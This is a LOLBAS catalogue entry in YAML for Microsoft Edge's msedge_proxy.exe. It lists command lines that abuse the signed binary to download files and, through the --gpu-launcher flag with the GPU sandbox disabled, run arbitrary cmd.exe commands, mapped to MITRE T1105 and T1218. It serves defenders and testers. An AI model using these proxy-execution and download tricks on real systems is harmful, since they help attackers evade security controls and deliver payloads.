LOLBAS/yml/OSBinaries/msedge_proxy.yml

33 lines
1.4 KiB
YAML
Raw Normal View History

2023-09-05 17:39:16 +02:00
---
2023-08-18 16:17:49 +02:00
Name: msedge_proxy.exe
2023-09-05 17:41:36 +02:00
Full_Path:
- Path: C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe
2023-09-05 17:47:05 +02:00
Description: Microsoft Edge Browser
2023-08-18 16:47:17 +02:00
Author: 'Mert Daş'
2023-08-18 16:17:49 +02:00
Created: 2023-08-18
Commands:
2023-09-03 21:23:40 +02:00
- Command: "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe http://example.com/test.zip"
2023-08-18 16:17:49 +02:00
Description: msedge_proxy will download malicious file.
Usecase: Download file from the internet
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
2023-09-03 21:23:40 +02:00
- Command: "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher=\"C:\\\\Windows\\\\System32\\\\cmd.exe /c curl ipinfo.io/json --output %USERPROFILE%\\\\Desktop\\\\test.json &&\""
2023-08-25 20:23:41 +02:00
Description: Edge will silently download the file.
2023-08-18 16:17:49 +02:00
Usecase: Download file from the internet
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
2023-09-03 21:23:40 +02:00
- Command: "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher=\"C:\\\\Windows\\\\System32\\\\cmd.exe /c ping google.com &&\""
2023-08-18 16:17:49 +02:00
Description: msedge_proxy.exe will execute file in the background
2023-09-03 21:28:00 +02:00
Usecase: Executes a process under a trusted Microsoft signed binary
2023-08-18 16:17:49 +02:00
Category: Execute
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10, Windows 11
Acknowledgement:
- Person: Mert Daş
Handle: '@merterpreter'